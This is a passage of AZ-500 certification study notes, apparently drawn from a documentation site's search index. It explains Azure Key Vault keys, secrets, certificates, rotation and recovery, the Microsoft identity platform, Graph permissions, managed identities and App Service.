        • Secret properties. Contains secret properties such as content type of addressable secret to generate the secret value, for retrieving certificate as a secret.
        • Lifetime Actions. Contains lifetime actions for the Key Vault certificate. Each lifetime action contains:
          • Trigger, which is specified as days before expiry or as a lifetime span percentage.
          • Action, which specifies the action type: emailContacts, or autoRenew.
        • Issuer: Contains the parameters about the certificate issuer to use to issue x509 certificates.
        • Policy attributes: Contains attributes associated with the policy.

        Certificate Issuer

        Before you can create a certificate issuer in a Key Vault, the following two prerequisite steps must be completed successfully:

        1. Onboard to CA providers: An organization administrator must onboard their company with at least one CA provider.
        2. Admin creates requester credentials for Key Vault to enroll (and renew) SSL certificates: Provides the configuration to be used to create an issuer object of the provider in the key vault.

        Certificate contacts

        Certificate contacts contain contact information to send notifications triggered by certificate lifetime events. The contacts information is shared by all the certificates in the key vault. If a certificate's policy is set to auto renewal, then a notification is sent for the following events:

        • Before certificate renewal
        • After certificate renewal, and stating if the certificate was successfully renewed, or if there was an error, requiring manual renewal of the certificate
        • When it's time to renew a certificate for a certificate policy that is set to manually renew (email only)

        Certificate access control

        The Key Vault that contains certificates manages access control for those same certificates. The access control policy for certificates is distinct from the access control policies for keys and secrets in the same Key Vault. Users might create one or more vaults to hold certificates, to maintain scenario-appropriate segmentation and management of certificates.

        • Permissions for certificate management operations:
          • get: Get the current certificate version, or any version of a certificate.
          • list: List the current certificates, or versions of a certificate.
          • update: Update a certificate.
          • create: Create a Key Vault certificate.
          • import: Import certificate material into a Key Vault certificate.
          • delete: Delete a certificate, its policy, and all of its versions.
          • recover: Recover a deleted certificate.
          • backup: Back up a certificate in a key vault.
          • restore: Restore a backed-up certificate to a key vault.
          • managecontacts: Manage Key Vault certificate contacts.
          • manageissuers: Manage Key Vault certificate authorities/issuers.
          • getissuers: Get a certificate's authorities/issuers.
          • listissuers: List a certificate's authorities/issuers.
          • setissuers: Create or update a Key Vault certificate's authorities/issuers.
          • deleteissuers: Delete a Key Vault certificate's authorities/issuers.
        • Permissions for privileged operations:
          • purge: Purge (permanently delete) a deleted certificate.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#13-create-key-vault-keys","title":"1.3. Create Key Vault keys","text":"

        Cryptographic keys in Key Vault are represented as\u00a0JSON Web Key (JWK)\u00a0objects. There are two types of keys, depending on how they were created.

        • Soft keys: A key processed in software by Key Vault, but is encrypted at rest using a system key that is in a Hardware Security Module (HSM). Clients may import an existing RSA or EC (Elliptic Curve) key, or request that Key Vault generates one.
        • Hard keys: A key processed in an HSM (Hardware Security Module). These keys are protected in one of the Key Vault HSM Security Worlds (there's one Security World per geography to maintain isolation). Clients may import an RSA or EC key, in soft form or by exporting from a compatible HSM device. Clients may also request Key Vault to generate a key.
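
        Creating each kind can be sketched as follows (the vault and key names are hypothetical; HSM protection requires a premium-tier vault):

        ```
        # Software-protected key (hypothetical names)
        az keyvault key create --vault-name kv-demo-123 --name app-key --protection software

        # HSM-protected key (requires a premium-tier vault)
        az keyvault key create --vault-name kv-demo-123 --name hsm-key --protection hsm
        ```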

        Key operations. - Key Vault supports many operations on key objects. Here are a few:

        • Create: Allows a client to create a key in Key Vault. The value of the key is generated by Key Vault and stored, and isn't released to the client. Asymmetric keys may be created in Key Vault.
        • Import: Allows a client to import an existing key to Key Vault. Asymmetric keys may be imported to Key Vault using many different packaging methods within a JWK construct.
        • Update: Allows a client with sufficient permissions to modify the metadata (key attributes) associated with a key previously stored within Key Vault.
        • Delete: Allows a client with sufficient permissions to delete a key from Key Vault.

        Cryptographic operations. - Once a key has been created in Key Vault, the following cryptographic operations may be performed using the key. For best application performance, verify that operations are performed locally.

        • Sign and Verify: Strictly, this operation is \"sign hash\" or \"verify hash\", as Key Vault doesn't support hashing of content as part of signature creation. Applications should hash the data to be signed locally, then request that Key Vault signs the hash. Verification of signed hashes is supported as a convenience operation for applications that may not have access to [public] key material.
        • Key Encryption / Wrapping: A key stored in Key Vault may be used to protect another key, typically a symmetric content encryption key (CEK). When the key in Key Vault is asymmetric, key encryption is used. When the key in Key Vault is symmetric, key wrapping is used.
        • Encrypt and Decrypt: A key stored in Key Vault may be used to encrypt or decrypt a single block of data. The size of the block is determined using the key type and selected encryption algorithm. The Encrypt operation is provided for convenience, for applications that may not have access to [public] key material.

        Apps hosted in App Service and Azure Functions can now define a reference to a secret managed in Key Vault as part of their application settings.

        Configure a hardware security module key-generation solution. -

        For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary. This scenario is often referred to as Bring Your Own Key (BYOK). The HSMs are FIPS 140-2 Level 2 validated. Azure Key Vault uses Thales nShield family of HSMs to protect your keys. (This functionality isn't available for Azure China.) Generating and transferring an HSM-protected key over the Internet:

        • You generate the key from an offline workstation, which reduces the attack surface.
        • The key is encrypted with a Key Exchange Key (KEK), which stays encrypted until transferred to the Azure Key Vault HSMs. Only the encrypted version of your key leaves the original workstation.
        • The toolset sets properties on your tenant key that binds your key to the Azure Key Vault security world. After the Azure Key Vault HSMs receive and decrypt your key, only these HSMs can use it. Your key can't be exported. This binding is enforced using the Thales HSMs.
        • The KEK that encrypts your key is generated inside the Azure Key Vault HSMs, and isn't exportable. The HSMs enforce that there can be no clear version of the KEK outside the HSMs. In addition, the toolset includes attestation from Thales that the KEK isn't exportable and was generated inside a genuine HSM manufactured by Thales.
        • The toolset includes attestation from Thales that the Azure Key Vault security world was also generated on a genuine HSM manufactured by Thales.
        • Microsoft uses separate KEKs and separate security worlds in each geographical region. This separation ensures that your key can be used only in data centers in the region in which you encrypted it. For example, a key from a European customer can't be used in data centers in North America or Asia.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#14-manage-customer-managed-keys","title":"1.4. Manage customer managed keys","text":"

        Once you have created your Key Vault and populated it with keys and secrets, the next step is to set up a rotation strategy for the values you store as Key Vault secrets. Secrets can be rotated in several ways (a CLI sketch follows this list):

        • As part of a manual process
        • Programmatically by using REST API calls
        • Through an Azure Automation script
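
        For the programmatic path, a single rotation step with the Azure CLI might look like this sketch (the names and value are hypothetical placeholders):

        ```
        # Writing a new value creates a new version of the secret (hypothetical names)
        az keyvault secret set --vault-name kv-demo-123 --name db-password --value '<new-value>'

        # Earlier versions remain listable for rollback or audit
        az keyvault secret list-versions --vault-name kv-demo-123 --name db-password
        ```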

        Example of storage service encryption with customer-managed keys. - This service uses Azure Key Vault, which provides highly available and scalable secure storage for RSA cryptographic keys backed by FIPS 140-2 Level 2 validated HSMs (Hardware Security Modules). Key Vault streamlines the key management process and enables customers to maintain control of the keys used to encrypt data, and to manage and audit their key usage, in order to protect sensitive data and meet regulatory or compliance needs such as HIPAA and BAA.

        Customers can generate/import their RSA key to Azure Key Vault and enable Storage Service Encryption. Azure Storage handles the encryption and decryption in a fully transparent fashion using envelope encryption in which data is encrypted using an AES-based key, which in turn is protected using the Customer-Managed Key stored in Azure Key Vault.

        Customers can rotate their key in Azure Key Vault as per their compliance policies. When they rotate their key, Azure Storage detects the new key version and re-encrypts the Account Encryption Key for that storage account. Key rotation doesn't result in re-encryption of all data, and there's no other action required from the user.

        Customers can also revoke access to the storage account by revoking access on their key in Azure Key Vault. There are several ways to revoke access to your keys. Revoking access effectively blocks access to all blobs in the storage account as the Account Encryption Key is inaccessible by Azure Storage.

        Customers can enable this feature on all available redundancy types of Azure Blob storage including premium storage and can toggle from using Microsoft managed to using customer-managed keys. There's no extra charge for enabling this feature.

        You can enable this feature on any Azure Resource Manager storage account using the Azure portal, Azure PowerShell, Azure CLI, or the Microsoft Azure Storage Resource Provider API.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#15-key-vault-secrets","title":"1.5. Key vault secrets","text":"

        Key Vault provides secure storage of secrets, such as passwords and database connection strings. From a developer's perspective, Key Vault APIs accept and return secret values as strings. Internally, Key Vault stores and manages secrets as sequences of octets (8-bit bytes), with a maximum size of 25k bytes each. The Key Vault service doesn't provide semantics for secrets. It merely accepts the data, encrypts it, stores it, and returns a secret identifier (\"ID\"). The identifier can be used to retrieve the secret at a later time.

        Key Vault also supports a contentType field for secrets. Clients may specify the content type of a secret to assist in interpreting the secret data when it's retrieved. The maximum length of this field is 255 characters. There are no pre-defined values. The suggested usage is as a hint for interpreting the secret data. For instance, an implementation may store both passwords and certificates as secrets, then use this field to differentiate.

        As shown above, the values for Key Vault Secrets are:

        • Name-value pair -\u00a0Name must be unique in the Vault
        • Value can be any\u00a0Unicode Transformation Format (UTF-8)\u00a0string - max of 25 KB in size
        • Manual or certificate creation
        • Activation date
        • Expiration date

        Encryption. - All secrets in your Key Vault are stored encrypted. Key Vault encrypts secrets at rest with a hierarchy of encryption keys, with all keys in that hierarchy are protected by modules that are Federal Information Processing Standards (FIPS) 140-2 compliant. This encryption is transparent, and requires no action from the user. The Azure Key Vault service encrypts your secrets when you add them, and decrypts them automatically when you read them. The encryption leaf key of the key hierarchy is unique to each key vault. The encryption root key of the key hierarchy is unique to the security world, and its protection level varies between regions:

        • China: root key is protected by a module that is validated for FIPS 140-2 Level 1.
        • Other regions: root key is protected by a module that is validated for FIPS 140-2 Level 2 or higher.

        Secret attributes. - In addition to the secret data, the following attributes may be specified:

        • exp: IntDate, optional,\u00a0default is forever. The\u00a0exp\u00a0(expiration time)\u00a0attribute identifies the expiration time on or after which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only as it informs users of key vault service that a particular secret may not be used. Its value MUST be a number containing an IntDate value.
        • nbf: IntDate, optional,\u00a0default is now. The\u00a0nbf\u00a0(not before)\u00a0attribute identifies the time before which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only. Its value\u00a0MUST\u00a0be a number containing an IntDate value.
        • enabled: boolean, optional,\u00a0default is true. This attribute specifies whether the secret data can be retrieved. The enabled attribute is used with\u00a0nbf\u00a0and\u00a0exp\u00a0when an operation occurs between\u00a0nbf\u00a0and\u00a0exp, it will only be permitted if enabled is set to true. Operations outside the\u00a0nbf\u00a0and\u00a0exp\u00a0window are automatically disallowed, except in particular situations.

        There are more read-only attributes that are included in any response that includes secret attributes:

        • created: IntDate, optional. The created attribute indicates when this version of the secret was created. This value is null for secrets created prior to the addition of this attribute. Its value must be a number containing an IntDate value.
        • updated: IntDate, optional. The updated attribute indicates when this version of the secret was updated. This value is null for secrets that were last updated prior to the addition of this attribute. Its value must be a number containing an IntDate value.

        Secret access control. - Access Control for secrets managed in Key Vault, is provided at the level of the Key Vault that contains those secrets. The following permissions can be used, on a per-principal basis, in the secrets access control entry on a vault, and closely mirror the operations allowed on a secret object:

        • Permissions for secret management operations

          • get: Read a secret
          • list: List the secrets or versions of a secret stored in a Key Vault
          • set: Create a secret
          • delete: Delete a secret
          • recover: Recover a deleted secret
          • backup: Back up a secret in a key vault
          • restore: Restore a backed up secret to a key vault
          • Permissions for privileged operations

          • purge: Purge (permanently delete) a deleted secret

        You can specify more application-specific metadata in the form of tags. Key Vault supports up to 15 tags, each of which can have a 256 character name and a 256 character value.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#configure-key-rotation","title":"Configure key rotation","text":"

        Once you have keys and secrets stored in the key vault it's important to think about a rotation strategy. There are several ways to rotate the values:

        • As part of a manual process
        • Programmatically by using API calls
        • Through an Azure Automation script

        This diagram shows how Event Grid and Function Apps can be used to automate the process.

        1. Thirty days before the expiration date of a secret, Key Vault publishes the \"near expiry\" event to Event Grid.
        2. Event Grid checks the event subscriptions and uses HTTP POST to call the function app endpoint subscribed to the event.
        3. The function app receives the secret information, generates a new random password, and creates a new version for the secret with the new password in Key Vault.
        4. The function app updates SQL Server with the new password.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#16-manage-key-vault-safety-and-recovery-features","title":"1.6. Manage Key Vault safety and recovery features","text":"

        Key Vault's soft-delete feature allows recovery of the deleted vaults and deleted key vault objects (for example, keys, secrets, certificates), known as soft-delete. This safeguard offer the following protections:

        • Once a secret, key, certificate, or key vault is deleted, it remains recoverable for a configurable period of 7 to 90 calendar days. If no configuration is specified, the default recovery period is set to 90 days. Users are provided with sufficient time to notice an accidental secret deletion and respond.
        • When creating a new key vault, soft-delete is on by default. Once soft-delete is enabled on a key vault, it can't be disabled. Once set, the retention policy interval can't be changed.
        • The soft-delete feature is available through the REST API, the Azure CLI, PowerShell, .NET/C# interfaces, and ARM templates.
        • The purge protection retention policy uses the same interval (7-90 days). Once set, the retention policy interval can't be changed.
        • You can't reuse the name of a key vault that has been soft-deleted until the retention period has passed.
        • Permanently deleting, purging, a key vault is possible via a POST operation on the proxy resource and requires special privileges. Generally, only the subscription owner is able to purge a key vault. The POST operation triggers the immediate and irrecoverable deletion of that vault. Exceptions are:

          • When the Azure subscription has been marked as\u00a0undeletable. In this case, only the service may then perform the actual deletion, and does so as a scheduled process.
          • When the--enable-purge-protection argument is enabled on the vault itself. In this case, Key Vault waits for 90 days from when the original secret object was marked for deletion to permanently delete the object.
        • To purge a secret in the soft-deleted state, a service principal must be granted another \"purge\" access policy permission. The purge access policy permission isn't granted by default to any service principal including key vault and subscription owners and must be deliberately set. By requiring an elevated access policy permission to purge a soft-deleted secret, it reduces the probability of accidentally deleting a secret.

        Key vault recovery. - Upon deleting a key vault object, the service will place the object in a deleted state, making it inaccessible to any retrieval operations. During the soft-delete retention interval, the following apply:

        • You may list all of the key vaults and key vault objects in the soft-delete state for your subscription as well as access deletion and recovery information about them. Only users with special permissions can list deleted vaults. We recommend that our users create a custom role with these special permissions for handling deleted vaults.
        • A key vault with the same name can't be created in the same location; correspondingly, a key vault object can't be created in a given vault if that key vault contains an object with the same name and which is in a deleted state.
        • Only a privileged user may restore a key vault or key vault object by issuing a recover command on the corresponding proxy resource. The user, member of the custom role, who has the privilege to create a key vault under the resource group can restore the vault.
        • Only a privileged user may forcibly delete a key vault or key vault object by issuing a delete command on the corresponding proxy resource.

        Unless a key vault or key vault object is recovered, at the end of the retention interval the service performs a purge of the soft-deleted key vault or key vault object and its content. Resource deletion may not be rescheduled.

        Billing. - In general, when an object (a key vault or a key or a secret) is in deleted state, there are only two operations possible: 'purge' and 'recover'. All the other operations fail. Therefore, even though the object exists, no operations can be performed and hence no usage will occur, so no bill. However there are following exceptions:

        • 'purge' and 'recover' actions count towards normal key vault operations and billed.
        • If the object is an HSM-key, the 'HSM Protected key' charge per key version per month charge applies if a key version has been used in last 30 days. After that, since the object is in deleted state no operations can be performed against it, so no charge will apply.

        Soft-deleted protection by default from February 2025. - If a secret is deleted and the key vault doesn't have soft-deleted protection, it's deleted permanently. Although users can currently opt out of soft-delete during key vault creation, this ability is deprecated. In February 2025, Microsoft enables soft-delete protection on all key vaults, and users are no longer be able to opt out of or turn off soft-delete. This, protect secrets from accidental or malicious deletion by a user.

        Key vault backup. - Back up secrets only if you have a critical business justification. Backing up secrets in your key vault may introduce operational challenges such as maintaining multiple sets of logs, permissions, and backups when secrets expire or rotate. Key Vault maintains availability in disaster scenarios and will automatically fail over requests to a paired region without any intervention from a user. If you want protection against accidental or malicious deletion of your secrets, configure soft-delete and purge protection features on your key vault.

        Key Vault does not support the ability to backup more than 500 past versions of a key, secret, or certificate object. Attempting to backup a key, secret, or certificate object may result in an error. It is not possible to delete previous versions of a key, secret, or certificate.

        Key Vault doesn't currently provide a way to back up an entire key vault in a single operation. Any attempt to use the commands listed in this document to do an automated backup of a key vault may result in errors and not supported by Microsoft or the Azure Key Vault team.

        When you back up a key vault object, such as a secret, key, or certificate, the backup operation downloads the object as an encrypted blob. This blob can't be decrypted outside of Azure.\u00a0To get usable data from this blob, you must restore the blob into a key vault within the same Azure subscription and Azure geography. To back up a key vault object, you must have:

        • Contributor-level or higher permissions on an Azure subscription.
        • A primary key vault that contains the secrets you want to back up.
        • A secondary key vault where secrets are restored.

        Azure Dedicated HSM is most suitable for \u201clift-and-shift\u201d scenarios that require direct and sole access to HSM devices. Examples include:

        • Migrating applications from on-premises to Azure Virtual Machines
        • Migrating applications from Amazon AWS EC2 to virtual machines that use the AWS Cloud HSM Classic service
        • Running shrink-wrapped software such as Apache/Ngnix SSL Offload, Oracle TDE, and ADCS in Azure Virtual Machines

        Azure Dedicated HSM is not a good fit for the following type of scenario: Microsoft cloud services that support encryption with customer-managed keys (such as Azure Information Protection, Azure Disk Encryption, Azure Data Lake Store, Azure Storage, Azure SQL Database, and Customer Key for Office 365) that are not integrated with Azure Dedicated HSM.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#2-application-security-features","title":"2. Application Security features","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#21-microsoft-identity-platform","title":"2.1. Microsoft Identity Platform","text":"

        Some acronyms:

        • Azure AD Authentication Library (ADAL)
        • Microsoft Authentication Library (MSAL)
        • Microsoft Secure Development Lifecycle (SDL)

        Microsoft identity platform is an evolution of the Azure Active Directory (Azure AD) developer platform. The Microsoft identity platform supports industry-standard protocols such as OAuth 2.0 and OpenID Connect. With this unified Microsoft identity platform (v2.0), you can write code once and authenticate any Microsoft identity into your application.

        The fully supported open-source Microsoft Authentication Library (MSAL) is recommended for use against the identity platform endpoints. MSAL... - is simple to use - provides great single sign-on (SSO) experiences for your users - helps you achieve high reliability and performance, - and is developed using Microsoft Secure Development Lifecycle (SDL).

        With the Microsoft identity platform, one can expand their reach to these kinds of users:

        • Work and school accounts (Microsoft Entra ID provisioned accounts)
        • Personal accounts (such as Outlook.com or Hotmail.com)
        • Your customers who bring their own email or social identity (such as LinkedIn, Facebook, and Google) via MSAL and Azure AD Business-to-Consumer (B2C)

        The Microsoft identity platform has two endpoints (v1.0 and v2.0); however, when developing a new application, consider it's highly recommended that you use the v2.0 (default) endpoint to benefit from the latest features and capabilities:

        The Microsoft Authentication Library or MSAL can be used in many application scenarios, including the following:

        • Single-page applications (JavaScript)
        • Web app signing in users
        • Web application signing in a user and calling a web API on behalf of the user
        • Protecting a web API so only authenticated users can access it
        • Web API calling another downstream Web API on behalf of the signed-in user
        • Desktop application calling a web API on behalf of the signed-in user
        • Mobile application calling a web API on behalf of the user who's signed in interactively.
        • Desktop/service daemon application calling web API on behalf of itself

        Languages and frameworks

        Library Supported platforms and frameworks MSAL for Android Android MSAL Angular Single-page apps with Angular and Angular.js frameworks MSAL for iOS and macOS iOS and macOS MSAL Go (Preview) Windows, macOS, Linux MSAL Java Windows, macOS, Linux MSAL.js JavaScript/TypeScript frameworks such as Vue.js, Ember.js, or Durandal.js MSAL.NET .NET Framework, .NET Core, Xamarin Android, Xamarin iOS, Universal Windows Platform MSAL Node Web apps with Express, desktop apps with Electron, Cross-platform console apps MSAL Python Windows, macOS, Linux MSAL React Single-page apps with React and React-based libraries (Next.js, Gatsby.js)

        Migrate apps that use ADAL to MSAL. - Active Directory Authentication Library (ADAL) integrates with the Azure AD for developers (v1.0) endpoint, where MSAL integrates with the Microsoft identity platform. The v1.0 endpoint supports work accounts but not personal accounts. The v2.0 endpoint is unifying Microsoft personal accounts and works accounts into a single authentication system. Additionally, with MSAL, you can also get authentications for Azure AD B2C.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#the-application-model","title":"The Application Model","text":"

        For an identity provider to know that a user has access to a particular app, both the user and the application must be registered with the identity provider. When you register your application with\u00a0Microsoft Entra ID, you're providing an identity configuration for your application that allows it to integrate with the Microsoft identity platform. Registering the app also allows you to:

        • Customize the branding of your application in the sign-in dialog box.
        • Decide if you want to allow users to sign in only if they belong to your organization. This architecture is known as a single-tenant application. Or, you can allow users to sign in by using any work or school account, which is known as a multi-tenant application.
        • Request scope permissions. For example, you can request the \"user.read\" scope, which grants permission to read the profile of the signed-in user.
        • Define scopes that define access to your web\u00a0application programming interface (API).
        • Share a secret with the Microsoft identity platform that proves the app's identity.

        After the app is registered, it's given a unique identifier that it shares with the Microsoft identity platform when it requests tokens. If the app is a confidential client application, it will also share the secret or the public key depending on whether certificates or secrets were used. The Microsoft identity platform represents applications by using a model that fulfills two main functions:

        • Identify the app by the authentication protocols it supports.
        • Provide all the identifiers,\u00a0Uniform Resource Locators (URLs), secrets, and related information that are needed to authenticate.

        The Microsoft identity platform:

        • Holds all the data required to support authentication at runtime.
        • Holds all the data for deciding what resources an app might need to access, and under what circumstances a given request should be fulfilled.
        • Provides infrastructure for implementing app provisioning within the app developer's tenant, and to any other Microsoft Entra tenant.
        • Handles user consent during token request time and facilitates the dynamic provisioning of apps across tenants.

        Flow in multi-tenant apps

        In this provisioning flow:

        1. A user from tenant B attempts to sign in with the app. The authorization endpoint requests a token for the application.
        2. The user credentials are acquired and verified for authentication.
        3. The user is prompted to provide consent for the app to gain access to tenant B.
        4. The Microsoft identity platform uses the application object in tenant A as a blueprint for creating a service principal in tenant B.
        5. The user receives the requested token.

        You can repeat this process for more tenants. Tenant A retains the blueprint for the\u00a0app (application object). Users and admins of all the other tenants where the app is given consent keep control over what the application is allowed to do via the corresponding service principal object in each tenant.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#22-register-an-application-with-app-registration","title":"2.2. Register an application with App Registration","text":"

        Before your app can get a token from the Microsoft identity platform, it must be registered in the Azure portal. Registration integrates your app with the Microsoft identity platform and establishes the information that it uses to get tokens, including:

        • Application ID: A unique identifier assigned by the Microsoft identity platform.
        • Redirect URI/URL: One or more endpoints at which your app will receive responses from the Microsoft identity platform. (For native and mobile apps, this is a URI assigned by the Microsoft identity platform.)
        • Application Secret: A password or a public/private key pair that your app uses to authenticate with the Microsoft identity platform. (Not needed for native or mobile apps.)

        Like most developers, you will probably use authentication libraries to manage your token interactions with the Microsoft identity platform. Authentication libraries abstract many protocol details, like validation, cookie handling, token caching, and maintaining secure connections, away from the developer and let you focus your development on your app. Microsoft publishes open-source client libraries and server middleware.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#23-configure-microsoft-graph-permissions","title":"2.3. Configure Microsoft Graph permissions","text":"

        Microsoft Graph exposes granular permissions that control the access that apps have to resources, like users, groups, and mail.

        Microsoft Graph has two types of permissions:

        • Delegated permissions\u00a0are used by apps that have a signed-in user present. For these apps, either the user or an administrator consents to the permissions that the app requests, and the app can act as the signed-in user when making calls to Microsoft Graph. Some delegated permissions can be consented by non-administrative users, but some higher-privileged permissions require administrator consent.
        • Application permissions\u00a0are used by apps that run without a signed-in user present; for example, apps that run as background services or daemons. Application permissions can only be consented by an administrator.

        Effective permissions are the permissions that your app will have when making requests to Microsoft Graph. It is important to understand the difference between the delegated and application permissions that your app is granted and its effective permissions when making calls to Microsoft Graph.

        For example, assume your app has been granted the User.ReadWrite.All delegated permission. This permission nominally grants your app permission to read and update the profile of every user in an organization. If the signed-in user is a global administrator, your app will be able to update the profile of every user in the organization. However, if the signed-in user is not in an administrator role, your app will be able to update only the profile of the signed-in user

        Microsoft Graph API. - \u00a0The Microsoft Graph Security API is an intermediary service (or broker) that provides a single programmatic interface to connect multiple Microsoft Graph Security providers (also called security providers or providers). The Microsoft Graph Security API federates requests to all providers in the Microsoft Graph Security ecosystem.

        The following is a description of the flow:

        1. The application user signs in to the provider application to view the consent form from the provider. This consent form experience or UI is owned by the provider and applies to non-Microsoft providers only to get explicit consent from their customers to send requests to Microsoft Graph Security API.
        2. The client consent is stored on the provider side.
        3. The provider consent service calls the Microsoft Graph Security API to inform consent approval for the respective customer.
        4. The application sends a request to the Microsoft Graph Security API.
        5. The Microsoft Graph Security API checks for the consent information for this customer mapped to various providers.
        6. The Microsoft Graph Security API calls all those providers the customer has given explicit consent to via the provider consent experience.
        7. The response is returned from all the consented providers for that client.
        8. The result set response is returned to the application.
        9. If the customer has not consented to any provider, no results from those providers are included in the response.

        Why use the Microsoft Graph Security API?

        • Write code \u2013 Find code samples in C#, Java, NodeJS, and more.
        • Connect using scripts \u2013 Find PowerShell samples.
        • Drag and drop into workflows and playbooks \u2013 Use Microsoft Graph Security connectors for Azure Logic Apps, Microsoft Flow, and PowerApps.
        • Get data into reports and dashboards \u2013 Use the Microsoft Graph Security connector for Power BI.
        • Connect using Jupyter notebooks \u2013 Find Jupyter notebook samples.
        • Unify and standardize alert tracking: Connect once to integrate alerts from any Microsoft Graph-integrated security solution and keep alert status and assignments in sync across all solutions. You can also stream alerts to security information and event management (SIEM) solutions, such as Splunk using Microsoft Graph Security API connectors.
        • Correlate security alerts to improve threat protection and response: Correlate alerts across security solutions more easily with a unified alert schema.
        • Update alert tags, status, and assignments: Tag alerts with additional context or threat intelligence to inform response and remediation. Ensure that comments and feedback on alerts are captured for visibility to all workflows. Keep alert status and assignments in sync so that all integrated solutions reflect the current state. Use webhook subscriptions to get notified of changes.
        • Unlock security context to drive investigation: Dive deep into related security-relevant inventory (like users, hosts, and apps), then add organizational context from other Microsoft Graph providers (Microsoft Entra ID, Microsoft Intune, Microsoft 365) to bring business and security contexts together and improve threat response.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#24-enable-managed-identities","title":"2.4. Enable managed identities","text":"

        Managed Identities\u00a0for Azure resources is the new name for the service formerly known as Managed Service Identity (MSI) for Azure resources feature in Microsoft Entra provides Azure services with an automatically managed identity in Microsoft Entra ID. You can use the identity to authenticate to any service that supports Microsoft Entra authentication, including Key Vault, without any credentials in your code. The managed identities for Azure resources feature is free with Microsoft Entra ID for Azure subscriptions. There's no additional cost.

        Terminology. - The following terms are used throughout the managed identities for Azure resources documentation set:

        • Client ID\u00a0- a unique identifier generated by Microsoft Entra ID that is tied to an application and service principal during its initial provisioning.
        • Principal ID\u00a0- the object ID of the service principal object for your managed identity that is used to grant role-based access to an Azure resource.
        • Azure Instance Metadata Service (IMDS)\u00a0- a REST endpoint accessible to all IaaS VMs created via the Azure Resource Manager. The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from within the VM.

        How managed identities for Azure resources works. - There are two types of managed identities:

        • A system-assigned managed identity\u00a0is enabled directly on an Azure service instance. When the identity is enabled, Azure creates an identity for the instance in the Microsoft Entra tenant that's trusted by the subscription of the instance. After the identity is created, the credentials are provisioned onto the instance. The lifecycle of a system-assigned identity is directly tied to the Azure service instance that it's enabled on. If the instance is deleted, Azure automatically cleans up the credentials and the identity in Microsoft Entra ID.
        • A user-assigned managed identity\u00a0is created as a standalone Azure resource. Through a create process, Azure creates an identity in the Microsoft Entra tenant that's trusted by the subscription in use. After the identity is created, the identity can be assigned to one or more Azure service instances. The lifecycle of a user-assigned identity is managed separately from the lifecycle of the Azure service instances to which it's assigned.

        The following table shows the differences between the two types of managed identities:

        Property System-assigned managed identity User-assigned managed identity Creation Created as part of an Azure resource (for example, Azure Virtual Machines or Azure App Service). Created as a stand-alone Azure resource. Life cycle Shared life cycle with the Azure resource that the managed identity is created with. When the parent resource is deleted, the managed identity is deleted as well. Independent life cycle. Must be explicitly deleted. Sharing across Azure resources Can\u2019t be shared. It can only be associated with a single Azure resource. Can be shared. The same user-assigned managed identity can be associated with more than one Azure resource. Common use cases Workloads contained within a single Azure resource. Workloads needing independent identities. For example, an application that runs on a single virtual machine. Workloads that run on multiple resources and can share a single identity. Workloads needing pre-authorization to a secure resource, as part of a provisioning flow. Workloads where resources are recycled frequently, but permissions should stay consistent. For example, a workload where multiple virtual machines need to access the same resource.

        Credential rotation. - Credential rotation is controlled by the resource provider that hosts the Azure resource. The default rotation of the credential occurs every 46 days. It's up to the resource provider to call for new credentials, so the resource provider could wait longer than 46 days. The following diagram shows how managed service identities work with Azure virtual machines (VMs):

        1. Azure Resource Manager receives a request to enable the system-assigned managed identity on a VM.
        2. Azure Resource Manager creates a service principal in Microsoft Entra ID for the identity of the VM. The service principal is created in the Microsoft Entra tenant that's trusted by the subscription.
        3. Azure Resource Manager configures the identity on the VM by updating the Azure Instance Metadata Service identity endpoint with the service principal client ID and certificate.
        4. After the VM has an identity, use the service principal information to grant the VM access to Azure resources. To call Azure Resource Manager, use role-based access control (RBAC) in Microsoft Entra ID to assign the appropriate role to the VM service principal. To call Key Vault, grant your code access to the specific secret or key in Key Vault.
        5. Your code that's running on the VM can request a token from the Azure Instance Metadata service endpoint, accessible only from within the VM:\u00a0http://169.254.169.254/metadata/identity/oauth2/token
          • The resource parameter specifies the service to which the token is sent. To authenticate to Azure Resource Manager, use resource=https://management.azure.com/.
          • API version parameter specifies the IMDS version, use api-version=2018-02-01 or greater.
        6. A call is made to Microsoft Entra ID to request an access token (as specified in step 5) by using the client ID and certificate configured in step 3. Microsoft Entra ID returns a JSON Web Token (JWT) access token.
        7. Your code sends the access token on a call to a service that supports Microsoft Entra authentication
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#25-azure-app-services","title":"2.5. Azure App Services","text":"

        Azure App Service\u00a0is an HTTP-based service for\u00a0hosting web applications,\u00a0REST APIs, and\u00a0mobile backends. You can develop in your favorite language, be it .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python. Applications run and scale with ease on both Windows and Linux-based environments. Azure App Service is a fully managed platform as a service (PaaS) offering for developers. Here are some key features of App Service:

        • Multiple languages and frameworks - App Service has first-class support for ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can also run PowerShell and other scripts or executables as background services.
        • Managed production environment - App Service automatically patches and maintains the OS and language frameworks for you.
        • Containerization and Docker - Dockerize your app and host a custom Windows or Linux container in App Service. Run multi-container apps with Docker Compose.
